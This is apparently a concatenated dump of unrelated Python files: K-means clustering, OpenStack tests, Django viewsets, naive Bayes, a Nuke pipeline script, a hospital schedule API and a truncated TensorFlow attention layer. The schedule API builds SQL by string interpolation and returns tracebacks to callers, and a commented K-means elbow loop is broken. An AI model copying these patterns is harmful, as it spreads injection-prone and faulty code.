| [
"arembedded@gmail.com"
] | arembedded@gmail.com |
d64b781daefef1110feddb5e2744a760069ebee6 | 4b459b254a7b77bdbaec250de7e2094dc0c97dec | /KmeansClustering.py | 0ad9a7e8e64b51cca8edb956a0f16a69f45e19da | [] | no_license | VirajDeshwal/KMeans-Clustering | a2fcbad5f48b9a455b9caaa67338287d55de2baa | d2bec00187208650e87976aeab6b0316397f4faa | refs/heads/master | 2021-09-03T15:24:20.690833 | 2018-01-10T04:37:30 | 2018-01-10T04:37:30 | 116,908,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,094 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 9 19:22:40 2018
@author: virajdeshwal
"""
print('Lets begin with the Kmeans Clustering.\n')
#intake = input('Press any key to continue....\n\n')
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
file = pd.read_csv('Mall_Customers.csv')
X = file.iloc[:,[3,4]].values
'''to find the optimal clusters use Elbow method... remove these comments and use the beolw code to check the elbow graph
# Now lets use the Elbow method to define the optioal number of clusters
#metric for clusters
wcss = []
from sklearn.cluster import KMeans
#for loop to check the clusters from 1 to 10
for i in range(1,11):
#intialization of the model
kmeans = KMeans(n_clusters=3, init='k-means++', n_init=10, max_iter=300, random_state=0)
#fitting the kmeans to the independent variables
#Now lets calculate the centroid of the cluster
wcss.append(kmeans.inertia_)
plt.plot(range(1,11),wcss)
plt.title('The Elbow Method')
plt.xlabel('Numbers of Clusters')
plt.ylabel('WCSS')
plt.show()'''
'''Now as we got the idea from the elbow graph about the optimal no. of clusters.
we will take the 5 clusters for our dataset.'''
#applying k-means to the dataset
from sklearn.cluster import KMeans
kmeans = KMeans(n_clusters=5, init='k-means++', n_init=10, max_iter=300, random_state=0)
y_means =kmeans.fit_predict(X)
plt.scatter(X[y_means==0,0], X[y_means==0,1], s=100, c='red', label = 'Careful pals')
plt.scatter(X[y_means==1,0], X[y_means==1,1], s=100, c='blue', label = 'average')
plt.scatter(X[y_means==2,0], X[y_means==2,1], s=100, c='green', label = 'Targets')
plt.scatter(X[y_means==3,0], X[y_means==3,1], s=100, c='magenta', label = 'Freak')
plt.scatter(X[y_means==4,0], X[y_means==4,1], s=100, c='cyan', label = 'Sensible')
plt.scatter(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], s=300, c='yellow', label = 'Centroids')
plt.title('clusters of client')
plt.xlabel('Annual Income(K$)')
plt.ylabel('Spending Score (1-100)')
plt.legend()
plt.show()
print('\nDone ;)')
| [
"viraj.deshwal@outlook.com"
] | viraj.deshwal@outlook.com |
d48ef93a9e163544fdfbe6db1328052df56d5cb7 | 4fad774a1a687a77f3f2e095622053d114201f51 | /src/codeposter_images.py | 2b994016e3c2ab8146797009c09cb40b5ef2820d | [] | no_license | jhumphry/tilings | 350892544f02c94d15d731a0ad7b33cb675c418f | b8524ab6b82c23834add7f0c77824e5f6bc3fd81 | refs/heads/master | 2020-09-15T16:04:59.464225 | 2019-11-23T09:15:47 | 2019-11-23T09:15:47 | 223,497,821 | 0 | 0 | null | 2019-11-22T22:38:10 | 2019-11-22T22:38:09 | null | UTF-8 | Python | false | false | 1,022 | py | import os
import random
import sys
from vector3 import Vector3, random_norm1
from tiling3 import Tiling3
target_dir = "posters/codeimages"
def unit_ball():
    """Render a 'unit ball' star figure to posters/codeimages/unit_ball.eps.

    Builds a Tiling3 whose edges connect the origin to 80 random unit
    vectors, then writes it out as EPS with randomly colored edges.
    """
    # Fixed seed so the generated poster image is reproducible.
    random.seed("A seed to keep the pattern consistent.")
    z = Vector3(0,0,0)
    # 80 random points on the unit sphere (dict keys act as a vertex set).
    v = dict((random_norm1(), None) for i in range(80))
    # One edge from each random point back to the origin.
    e = dict((frozenset([x,z]), None) for x in v)
    v[z] = None
    # Shift along +z so the figure sits inside the EPS viewing box below.
    t = Tiling3(v, e, {}, {}).translate(Vector3(0,0,2))
    with open(os.path.join(target_dir, "unit_ball.eps"), 'w') as f:
        geobox = (0.1, 2.8, -0.6, 1.8)
        psbox = (0, 0, 200, 200)
        # Each edge gets a random primary color (red/green/blue).
        edgecol = lambda x: random.choice([(1,0,0), (0,1,0), (0,0,1)])
        t.write_eps(f, psbox, geobox, edgecol=edgecol, whiterange=3.0)
if __name__=="__main__":
    # Each command-line argument names an image to generate; the path and
    # extension are stripped so "a/b/unit_ball.eps" selects "unit_ball".
    a = sys.argv[1:]
    if not a:
        print("Run with the names of the files to generate")
        exit()
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)
    for n in a:
        n = n.split("/")[-1].split(".")[0]
        if n=="unit_ball":
            unit_ball()
| [
"cranch@cantab.net"
] | cranch@cantab.net |
bf9a99c1fbd4e7d74fba7c31b418178d0eeb5143 | 3c66373d07ced2bc8eff0f49d9848169f332e191 | /directory_sso_api_client/__init__.py | a0ddb16219cd47ebd5559f956b0182aa8ef68993 | [
"MIT"
] | permissive | uktrade/directory-sso-api-client | 174c51307e90b02663b7f1f57a168f0695b4a26a | f93d552527d0cfff948cccc9c5c32293924693b1 | refs/heads/master | 2023-07-22T11:40:05.866044 | 2023-07-06T09:13:31 | 2023-07-06T09:13:31 | 72,042,961 | 0 | 1 | MIT | 2023-07-06T09:13:33 | 2016-10-26T20:45:44 | Python | UTF-8 | Python | false | false | 89 | py | from directory_sso_api_client.client import sso_api_client
__all__ = ['sso_api_client']
| [
"rikatee@gmail.com"
] | rikatee@gmail.com |
a12137297210e2a7150057ab063356d001721283 | d7744325ebf3963874f924d8474003ba13eccc78 | /openstack_sdk/tests/compute/test_host_aggregate.py | 347db1b835d9bd6875cda671e9d0fac13c153b5b | [] | no_license | cloudify-incubator/cloudify-openstacksdk-plugin | 5fc80c0438eaf2c05833b6795ef1ce3bfb18bea8 | cdc5f80d8c597d78c80577191538ade1cf7238de | refs/heads/master | 2021-07-14T16:04:54.253530 | 2020-06-22T12:17:55 | 2020-06-22T12:17:55 | 155,547,727 | 1 | 0 | null | 2020-06-15T12:09:28 | 2018-10-31T11:40:20 | Python | UTF-8 | Python | false | false | 5,078 | py | # #######
# Copyright (c) 2019 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Standard imports
import mock
# Third party imports
import openstack.compute.v2.aggregate
# Local imports
from openstack_sdk.tests import base
from openstack_sdk.resources import compute
class HostAggregateTestCase(base.OpenStackSDKTestBase):
    """Unit tests for compute.OpenstackHostAggregate using a mocked SDK client."""
    def setUp(self):
        # Build the resource wrapper around a fake openstack connection so no
        # real API calls are made.
        super(HostAggregateTestCase, self).setUp()
        self.fake_client =\
            self.generate_fake_openstack_connection('host_aggregate')
        self.host_aggregate_instance = compute.OpenstackHostAggregate(
            client_config=self.client_config,
            logger=mock.MagicMock()
        )
        self.host_aggregate_instance.connection = self.connection
    def test_get_host_aggregate(self):
        """get() should return the aggregate reported by the SDK."""
        aggregate = openstack.compute.v2.aggregate.Aggregate(**{
            'id': 'a34b5509-c122-4c2f-823e-884bb559afe8',
            'name': 'test_aggregate',
            'availability_zone': 'test_availability_zone',
        })
        self.host_aggregate_instance.name = 'test_aggregate'
        self.host_aggregate_instance.id = \
            'a34b5509-c122-4c2f-823e-884bb559afe8'
        self.fake_client.get_aggregate = mock.MagicMock(return_value=aggregate)
        response = self.host_aggregate_instance.get()
        self.assertEqual(response.id, 'a34b5509-c122-4c2f-823e-884bb559afe8')
        self.assertEqual(response.name, 'test_aggregate')
    def test_list_aggregates(self):
        """list() should return every aggregate the SDK reports."""
        aggregate_list = [
            openstack.compute.v2.aggregate.Aggregate(**{
                'id': 'a34b5509-c122-4c2f-823e-884bb559afe8',
                'name': 'test_aggregate_1',
                'availability_zone': 'test_availability_zone_1',
            }),
            openstack.compute.v2.aggregate.Aggregate(**{
                'id': 'a44b5509-c122-4c2f-823e-884bb559afe8',
                'name': 'test_aggregate_2',
                'availability_zone': 'test_availability_zone_2',
            }),
        ]
        self.fake_client.aggregates = \
            mock.MagicMock(return_value=aggregate_list)
        response = self.host_aggregate_instance.list()
        self.assertEqual(len(response), 2)
    def test_create_aggregate(self):
        """create() should pass the config through and return the new aggregate."""
        config = {
            'name': 'test_aggregate',
            'availability_zone': 'test_availability_zone',
        }
        aggregate = {
            'id': 'a34b5509-c122-4c2f-823e-884bb559afe8',
            'name': 'test_aggregate',
            'availability_zone': 'test_availability_zone',
        }
        self.host_aggregate_instance.config = config
        new_res = openstack.compute.v2.aggregate.Aggregate(**aggregate)
        self.fake_client.create_aggregate = \
            mock.MagicMock(return_value=new_res)
        response = self.host_aggregate_instance.create()
        self.assertEqual(response.name, config['name'])
    def test_update_aggregate(self):
        """update() should return the SDK's updated aggregate, not the old one."""
        old_aggregate = openstack.compute.v2.aggregate.Aggregate(**{
            'id': 'a34b5509-c122-4c2f-823e-884bb559afe8',
            'name': 'test_aggregate',
            'availability_zone': 'test_availability_zone',
        })
        new_config = {
            'name': 'update_test_aggregate',
        }
        new_aggregate = openstack.compute.v2.aggregate.Aggregate(**{
            'id': 'a34b5509-c122-4c2f-823e-884bb559afe8',
            'name': 'update_test_aggregate',
            'availability_zone': 'test_availability_zone',
        })
        self.host_aggregate_instance.resource_id = \
            'a34b5509-c122-4c2f-823e-884bb559afe8'
        self.fake_client.get_aggregate = \
            mock.MagicMock(return_value=old_aggregate)
        self.fake_client.update_aggregate =\
            mock.MagicMock(return_value=new_aggregate)
        response = self.host_aggregate_instance.update(new_config=new_config)
        self.assertNotEqual(response.name, old_aggregate.name)
    def test_delete_server(self):
        # NOTE(review): despite the name, this exercises aggregate deletion,
        # not server deletion; consider renaming to test_delete_aggregate.
        aggregate = openstack.compute.v2.aggregate.Aggregate(**{
            'id': 'a34b5509-c122-4c2f-823e-884bb559afe8',
            'name': 'test_aggregate',
            'availability_zone': 'test_availability_zone',
        })
        self.host_aggregate_instance.resource_id = \
            'a34b5509-c122-4c2f-823e-884bb559afe8'
        self.fake_client.get_aggregate = mock.MagicMock(return_value=aggregate)
        self.fake_client.delete_aggregate = mock.MagicMock(return_value=None)
        response = self.host_aggregate_instance.delete()
        self.assertIsNone(response)
| [
"mohammeda@cloudify.co"
] | mohammeda@cloudify.co |
10d61f06d704d646df9442f624733c2ca3254ec4 | cbf967d1359e2d284a2d9acb39dc28cb363d6f1d | /backend/course/api/v1/viewsets.py | cd5e653768a7b3c797677ce2388856d66c087a6e | [] | no_license | crowdbotics-apps/ceh-trainer-19190 | 1eaed7e7dabff24aa10fda0f41ebc98c6237c254 | 4ed128efe6cebada48196a8be05343355f5dce9f | refs/heads/master | 2022-11-20T15:53:34.774222 | 2020-07-26T11:51:10 | 2020-07-26T11:51:10 | 282,638,774 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,400 | py | from rest_framework import authentication
from course.models import (
Recording,
Event,
Subscription,
Course,
Group,
Module,
PaymentMethod,
SubscriptionType,
Enrollment,
Lesson,
Category,
)
from .serializers import (
RecordingSerializer,
EventSerializer,
SubscriptionSerializer,
CourseSerializer,
GroupSerializer,
ModuleSerializer,
PaymentMethodSerializer,
SubscriptionTypeSerializer,
EnrollmentSerializer,
LessonSerializer,
CategorySerializer,
)
from rest_framework import viewsets
# Each viewset below exposes full CRUD endpoints for one course-app model,
# accepting either session or token authentication.
class EventViewSet(viewsets.ModelViewSet):
    """CRUD API for Event objects."""
    serializer_class = EventSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Event.objects.all()
class ModuleViewSet(viewsets.ModelViewSet):
    """CRUD API for Module objects."""
    serializer_class = ModuleSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Module.objects.all()
class CourseViewSet(viewsets.ModelViewSet):
    """CRUD API for Course objects."""
    serializer_class = CourseSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Course.objects.all()
class CategoryViewSet(viewsets.ModelViewSet):
    """CRUD API for Category objects."""
    serializer_class = CategorySerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Category.objects.all()
class GroupViewSet(viewsets.ModelViewSet):
    """CRUD API for Group objects."""
    serializer_class = GroupSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Group.objects.all()
class LessonViewSet(viewsets.ModelViewSet):
    """CRUD API for Lesson objects."""
    serializer_class = LessonSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Lesson.objects.all()
class EnrollmentViewSet(viewsets.ModelViewSet):
    """CRUD API for Enrollment objects."""
    serializer_class = EnrollmentSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Enrollment.objects.all()
class PaymentMethodViewSet(viewsets.ModelViewSet):
    """CRUD API for PaymentMethod objects."""
    serializer_class = PaymentMethodSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = PaymentMethod.objects.all()
class SubscriptionTypeViewSet(viewsets.ModelViewSet):
    """CRUD API for SubscriptionType objects."""
    serializer_class = SubscriptionTypeSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = SubscriptionType.objects.all()
class SubscriptionViewSet(viewsets.ModelViewSet):
    """CRUD API for Subscription objects."""
    serializer_class = SubscriptionSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Subscription.objects.all()
class RecordingViewSet(viewsets.ModelViewSet):
    """CRUD API for Recording objects."""
    serializer_class = RecordingSerializer
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
    queryset = Recording.objects.all()
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
adc2754dfd54adf3e35acefd3fd83a06c74b18e0 | 87dcd590e7174c30a4caca1039966d6659cb0f29 | /count.py | 320c3e411b38dd90944f5587b3357d0657bfcc8d | [
"Unlicense"
] | permissive | mecroby/test_pi_learning | 8ad1cde9dd9e4e707863ccb865722122d8dd6a07 | 5e32b768968b523445578f8dc33dd720930c72e7 | refs/heads/master | 2021-07-14T09:11:08.719483 | 2017-10-18T20:23:50 | 2017-10-18T20:23:50 | 107,400,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Oct 14 14:48:25 2017
@author: roby
"""
import sys
# Count the lines piped in on stdin and print the total.
# NOTE: Python 2 syntax (`print` statement).
count=0
for line in sys.stdin:
    count +=1
print count
| [
"noreply@github.com"
] | mecroby.noreply@github.com |
5f5c70b276a12bb5f83506928706a4162ca598d4 | abbc11abfabb0d3976789a9ec073b28892c78778 | /bias_classifier/classifier_all.py | c3bdb57855da671e2e85b26f5d47dd0e150137c6 | [] | no_license | sunxhap/machine_learning | b06b28b3aba5b39704d8a3ae282f366dad6af406 | ef1d80a16fd35f03e428ac27b9b0f771f6f1edbb | refs/heads/master | 2022-05-01T15:22:07.314221 | 2017-11-12T09:12:30 | 2017-11-12T09:12:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,915 | py | # -*- coding: utf-8 -*-
"""
@Time: 2017/11/8 13:42
@Author: sunxiang
"""
import csv
import random
import math
def loadCsv(filename):
    """Load a CSV file as a list of rows of floats.

    NOTE: opening in 'rb' mode for csv.reader is Python 2 style.
    """
    lines = csv.reader(open(filename, "rb"))
    dataset = list(lines)
    for i in range(len(dataset)):
        # Handle cells that are zero: replace 0 with 0.1, presumably to avoid
        # zero variance / zero probabilities downstream — TODO confirm.
        # (Note: csv cells are strings, so only the '0' comparison can match.)
        temp_list = list()
        for x in dataset[i]:
            if x == 0 or x == '0':
                x = 0.1
            temp_list.append(float(x))
        dataset[i] = temp_list
        # dataset[i] = [float(x) for x in dataset[i]]
    return dataset
def splitDataset(dataset, splitRatio):
    """Randomly partition dataset into [train, test].

    The training set gets int(len(dataset) * splitRatio) rows drawn without
    replacement; the remainder becomes the test set.
    """
    target = int(len(dataset) * splitRatio)
    remaining = list(dataset)
    training = []
    while len(training) < target:
        pick = random.randrange(len(remaining))
        training.append(remaining.pop(pick))
    return [training, remaining]
def separateByClass(dataset):
    """Group rows by their class label (the last element of each row)."""
    separated = {}
    for vector in dataset:
        label = vector[-1]
        separated.setdefault(label, []).append(vector)
    return separated
def mean(numbers):
    """Return the arithmetic mean of a non-empty sequence of numbers."""
    count = float(len(numbers))
    return sum(numbers) / count
def stdev(numbers):
    """Return the sample standard deviation (n - 1 denominator) of numbers.

    Raises ZeroDivisionError for sequences of length 1, like the original.
    """
    n = float(len(numbers))
    avg = sum(numbers) / n
    squared_error = sum(pow(x - avg, 2) for x in numbers)
    return math.sqrt(squared_error / (n - 1.0))
def summarize(dataset):
    """Per-column (mean, stdev) pairs, excluding the final class-label column."""
    columns = zip(*dataset)
    stats = [(mean(column), stdev(column)) for column in columns]
    stats.pop()  # drop the class-label column's statistics
    return stats
def summarizeByClass(dataset):
    """Per-class Gaussian statistics: {class_value: [(mean, stdev) per feature]}."""
    separated = separateByClass(dataset)
    summaries = {}
    # NOTE: dict.iteritems() is Python 2 only.
    for classValue, instances in separated.iteritems():
        summaries[classValue] = summarize(instances)
    return summaries
def calculateProbability(x, mean, stdev):
    """Gaussian probability density of x under N(mean, stdev**2).

    Note the parameters `mean` and `stdev` shadow the module-level helper
    functions of the same names inside this body.
    """
    z = (x - mean) / stdev
    coefficient = 1.0 / (math.sqrt(2 * math.pi) * stdev)
    return coefficient * math.exp(-0.5 * z * z)
def calculateClassProbabilities(summaries, inputVector):
    """Naive-Bayes likelihood of inputVector for each class.

    Multiplies the per-feature Gaussian densities (independence assumption);
    no class prior is applied. Returns {class_value: likelihood}.
    """
    probabilities = {}
    # NOTE: dict.iteritems() is Python 2 only.
    for classValue, classSummaries in summaries.iteritems():
        probabilities[classValue] = 1
        for i in range(len(classSummaries)):
            mean, stdev = classSummaries[i]
            x = inputVector[i]
            probabilities[classValue] *= calculateProbability(x, mean, stdev)
    return probabilities
def predict(summaries, inputVector):
    """Return the class value with the highest naive-Bayes likelihood."""
    probabilities = calculateClassProbabilities(summaries, inputVector)
    bestLabel, bestProb = None, -1
    # NOTE: dict.iteritems() is Python 2 only; ties keep the first class seen.
    for classValue, probability in probabilities.iteritems():
        if bestLabel is None or probability > bestProb:
            bestProb = probability
            bestLabel = classValue
    return bestLabel
def getPredictions(summaries, testSet):
    """Predict a class label for every row in testSet."""
    return [predict(summaries, row) for row in testSet]
def getAccuracy(testSet, predictions):
    """Percentage of rows whose true label (last column) matches the prediction."""
    hits = 0
    for position, row in enumerate(testSet):
        if row[-1] == predictions[position]:
            hits += 1
    return (hits / float(len(testSet))) * 100.0
def main():
    """Train and evaluate the Gaussian naive-Bayes classifier on a CSV file.

    NOTE: Python 2 — `print(...)` here is the print statement applied to a
    `str.format` expression.
    """
    # filename = 'pima_indians_data.csv'
    # filename = 'old_data.csv'
    filename = '../data/dianshang_3121867.csv'
    # 0.67
    splitRatio = 0.67  # fraction for the training set vs. the test set
    dataset = loadCsv(filename)
    trainingSet, testSet = splitDataset(dataset, splitRatio)
    print('Split {0} rows into train={1} and test={2} rows').format(len(dataset), len(trainingSet), len(testSet))
    # prepare model
    summaries = summarizeByClass(trainingSet)
    # summaries = summaries.pop(88.0)
    # test model
    predictions = getPredictions(summaries, testSet)
    accuracy = getAccuracy(testSet, predictions)
    print('Accuracy: {0}%').format(accuracy)
    # import pickle
    # fw = open("classifier.txt", "w")
    # pickle.dump(summaries, fw)
    # fw.close()
    # f = open("classifier.txt")
    # summaries = pickle.load(f)
    # f.close()
    # pass
main()
"1925453680@qq.com"
] | 1925453680@qq.com |
c13d1f9ed680f1a733827a0c11d2c1f63413f6e4 | f7eedef4cff9bcb9ad8aec7a872cdbedf1844d5f | /HQMS_Cloud/controller/WXSchedule.py | 593217605863c318932a2637e9f64f8607e1b608 | [] | no_license | 8261956/HQMS | dd6bfc9d3a364d82e771ca50e45a4b97594698e8 | 9b95fd26f9c5fc920436d1545eeb47c0151c08d9 | refs/heads/master | 2021-05-05T22:42:23.058859 | 2018-03-28T03:11:23 | 2018-03-28T03:11:23 | 116,200,468 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,545 | py | # -*- coding: utf-8 -*-
import json
import sys
import traceback
import datetime
import web
from common import DBBase as DB
from common.func import packOutput, checkSession, str2List
from WXQueue import WXQueue
from WXWorker import WXWorker
class WXSchedule(object):
    """Queries weekly expert-queue schedules for one hospital."""
    # Shared database handle for all instances.
    db = DB.hqms_cloud_db()
    def __init__(self, hospital_name):
        self.hospitalName = hospital_name
    def getScheduleByQueue(self, queue_filter):
        """Return this week's schedule info for the queue matching queue_filter."""
        result = {}
        # Compute Monday..Sunday of the current week.
        current_date = datetime.date.today()
        startTime = (current_date - datetime.timedelta(current_date.weekday())).strftime("%Y-%m-%d")
        endTime = (current_date + datetime.timedelta(6 - current_date.weekday())).strftime("%Y-%m-%d")
        # Fetch the queue's base information; empty result means no such queue.
        queue_info = WXQueue(self.hospitalName).getQueueInfoByFilter(queue_filter)
        if not queue_info:
            return result
        # Fetch the expert's info (first worker listed in "workerLimit";
        # note pop() mutates queue_info so the key is not echoed back).
        workerID = str2List(queue_info.pop("workerLimit"))[0]
        workerInfo = WXWorker(self.hospitalName).getWorkerInfo(workerID)
        # Fetch the queue's schedule rows for this week.
        # NOTE(review): the WHERE clause is built via string interpolation;
        # presumably queue_filter comes from trusted data — verify upstream.
        where = "queue=\'%s\' AND workDate BETWEEN \'%s\' AND \'%s\'" % (
            queue_filter, startTime, endTime)
        schedule_list = self.db.select("schedule", where=where)
        schedule = []
        # Keep only days the expert is actually on duty.
        for item in schedule_list:
            if item["onDuty"] == 1:
                tmp = {
                    "onDuty": item["onDuty"],
                    "workDate": item["workDate"],
                    "workTime": item["workTime"],
                    "weekday": item["weekday"]
                }
                schedule.append(tmp)
        result.update(queue_info)
        result.update({"schedule": schedule, "workerInfo": workerInfo})
        return result
    def getScheduleByWorkerID(self, workerID):
        """Return schedules for every queue belonging to the given expert ID."""
        queue_filter = WXQueue(self.hospitalName).getQueueFilterByWorkerID(workerID)
        result = {"list": []}
        for filter in queue_filter:
            queue_schedule = self.getScheduleByQueue(filter)
            result["list"].append(queue_schedule)
        return result
    def getScheduleByDepartment(self, department):
        """Return schedules for every queue in the given department."""
        queue_filter = WXQueue(self.hospitalName).getQueueFilterByDepartment(department)
        result = {"list": []}
        for filter in queue_filter:
            queue_schedule = self.getScheduleByQueue(filter)
            result["list"].append(queue_schedule)
        return result
class WXScheduleInterface(object):
    """web.py POST handler that dispatches schedule queries by 'action' name."""
    # Maps the JSON 'action' value to the handler method name.
    support_action = {
        "getScheduleByWorkerID": "getScheduleByWorkerID",
        "getScheduleByDepartment": "getScheduleByDepartment"
    }
    def POST(self, input_data):
        """Parse the JSON body, check the session token, and dispatch.

        Returns a packOutput-wrapped payload; errors map to 400/401/500 codes.
        """
        data = json.loads(web.data())
        token = data.pop("token", None)
        if token:
            if not checkSession(token):
                return packOutput({}, "401", "Token authority failed")
        action = data.pop("action", None)
        if action is None:
            return packOutput({}, code='400', errorInfo='action required')
        if action not in self.support_action:
            return packOutput({}, code='400', errorInfo='unsupported action')
        try:
            result = getattr(self, self.support_action[action])(data)
            return packOutput(result)
        except Exception as e:
            # Return the full traceback so callers can diagnose server errors.
            exc_traceback = sys.exc_info()[2]
            errorInfo = traceback.format_exc(exc_traceback)
            return packOutput({"errorInfo": str(e), "rescode": "500"},
                              code='500', errorInfo=errorInfo)
    def getScheduleByWorkerID(self, data):
        """Return the weekly schedule for one expert, keyed by workerID."""
        hospitalName = data.get("hospitalName", None)
        if hospitalName is None:
            raise Exception("hospital name required")
        workerID = data.get("workerID", None)
        if workerID is None:
            # Fixed: the message previously said 'workerName required', which
            # did not match the field actually being validated.
            raise Exception("workerID required")
        schedule_info = WXSchedule(hospitalName).getScheduleByWorkerID(workerID)
        return schedule_info
    def getScheduleByDepartment(self, data):
        """Return weekly schedules for every expert queue in a department."""
        hospitalName = data.get("hospitalName", None)
        if hospitalName is None:
            raise Exception("hospital name required")
        department = data.get("department", None)
        if department is None:
            raise Exception("department required")
        schedule_info = WXSchedule(hospitalName).getScheduleByDepartment(department)
        return schedule_info
"qiupengfei@cleartv.cn"
] | qiupengfei@cleartv.cn |
a55dac7f367c56e690c755d0fe804af2e655c9c9 | cffe83637b3965ad27f5a679e187bfaf46afa690 | /.stversions/cookbook/magic_browser/cookbook/nuke/menus/Lumbermill/BuildShot~20210212-114815.py | ae6334ddf7ac7ae3b88f406b07d78e13323f2ac3 | [] | no_license | gmolinart/LC_MASTER | da768a592821fe4dc55bdf693291df3409c3f035 | 2f17eaf5c4c7f70be0c0b5976b479002da4e7d52 | refs/heads/master | 2023-04-29T07:38:24.653457 | 2021-05-17T18:42:34 | 2021-05-17T18:42:34 | 368,287,070 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,629 | py | import nuke
from cgl.core.path import PathObject, lj_list_dir, find_latest_publish_objects
from cgl.core.config import app_config
from cgl.plugins.nuke.cgl_nuke import NukePathObject, import_directory, import_media, set_comp_default_settings , confirm_prompt
import os
def check_file_on_system():
    """Return True when the current Nuke script has a filename (is saved).

    Previously returned None implicitly for unsaved scripts; now returns an
    explicit bool, which is backward compatible with truthiness checks.
    """
    current_shot = PathObject(nuke.root().name())
    return bool(current_shot.filename)
def get_dependencies():
    """Return latest-version publish PathObjects for every task of this shot.

    Only tasks whose published render directory actually exists on disk are
    included.
    """
    current_shot = PathObject(nuke.root().name())
    all_tasks = current_shot.glob_project_element('task')
    publish_objects = []
    for task in all_tasks:
        # Latest published render for this task (user='publish', context='render').
        task_object = current_shot.copy(filename='',
                                        task=task,
                                        user='publish',
                                        context='render').latest_version()
        if os.path.isdir(task_object.copy(filename = '').path_root):
            publish_objects.append(task_object)
    return(publish_objects)
def import_dependencies():
    """Create a Read node plus a colored backdrop for each published task.

    Skips the task matching the current comp's own task. Backdrop color is
    chosen per task name (plate/elem/cam), falling back to a default.
    """
    current_shot = PathObject(nuke.root().name())
    publish_objects = get_dependencies()
    spread = 0  # NOTE(review): unused; candidate for removal
    for task_object in publish_objects:
        if task_object.task != current_shot.task:
            # First file in the publish directory stands in for the sequence.
            filename = lj_list_dir(task_object.path_root)[0]
            sequence_path = task_object.copy(filename=filename)
            print(task_object.path)
            readNode = import_media(sequence_path.path_root, name=task_object.task)
            readNode.setSelected(True)
            # Per-task backdrop tile colors (Nuke packed RGBA floats).
            color_dic = {'plate': 1278818815.0, 'elem': 1230983935.0, 'cam': 1264526079.0, 'default': 825305599.0}
            if task_object.task in color_dic.keys():
                tile_color = color_dic[task_object.task]
            else:
                tile_color = color_dic['default']
            # Frame the Read node with a labeled backdrop.
            n = nuke.nodes.BackdropNode(xpos=readNode.xpos() - 20,
                                        bdwidth=120,
                                        ypos=readNode.ypos() - 80,
                                        bdheight=170,
                                        tile_color=tile_color,
                                        note_font_size=42,
                                        z_order=0,
                                        name='{} BACKDROP'.format(
                                            task_object.task.upper()),
                                        label=task_object.task.upper())
def run():
    """Entry point: build the shot if the script is saved, else warn the user."""
    if check_file_on_system():
        import_dependencies()
        set_comp_default_settings()
    else:
        # NOTE(review): 'sytem' typo in this user-facing message.
        confirm_prompt(title = 'ERROR', message = 'File not in sytem please open file ')
| [
"gmolinart@gmail.com"
] | gmolinart@gmail.com |
54714091e40e4dea6c5b79bad259c023f9dcf308 | b7a2b794541f7d6f76261ca5cfaf58eb05be830b | /codes/2022/oct/scaled_dot_product_attention.py | bf2e60efb1f5f6846256c1e06f8e9fe74be1f010 | [
"MIT"
] | permissive | GaoangLiu/GaoangLiu.github.io | 3853cdd8599f8ab7bc073de376e32762c1a0ded3 | 66cf3d9cd0e074af21ec97ce15a0e9211b23a884 | refs/heads/master | 2023-05-15T03:31:30.950588 | 2023-05-01T02:18:00 | 2023-05-01T02:18:00 | 163,704,502 | 0 | 1 | MIT | 2021-07-14T00:25:03 | 2019-01-01T00:18:31 | Jupyter Notebook | UTF-8 | Python | false | false | 1,618 | py | #!/usr/bin/env python
import codefast as cf
from tensorflow import matmul, math, cast, float32
from tensorflow import keras as K
import numpy as np
# Implementing the Scaled-Dot Product Attention
class DotProductAttention(K.layers.Layer):
    """Scaled dot-product attention: softmax(Q K^T / sqrt(d_k)) V."""
    def __init__(self, **kwargs):
        super(DotProductAttention, self).__init__(**kwargs)
    def call(self,
             queries: np.ndarray,
             keys: np.ndarray,
             values: np.ndarray,
             d_k: int,
             mask=None):
        # Scoring the queries against the keys after transposing the latter, and scaling
        # (`math` here is tensorflow.math, imported at module level).
        scores = matmul(queries, keys, transpose_b=True) / math.sqrt(
            cast(d_k, float32))
        # Apply mask to the attention scores: masked positions get a large
        # negative value so softmax drives their weights toward zero.
        if mask is not None:
            scores += -1e9 * mask
        # Computing the weights by a softmax operation
        weights = K.backend.softmax(scores)
        # Computing the attention by a weighted sum of the value vectors
        return matmul(weights, values)
def test():
    """Smoke-test DotProductAttention on random query/key/value batches."""
    d_k = 64  # Dimensionality of the linearly projected queries and keys
    d_v = 64  # Dimensionality of the linearly projected values
    batch_size = 3  # Batch size from the training process
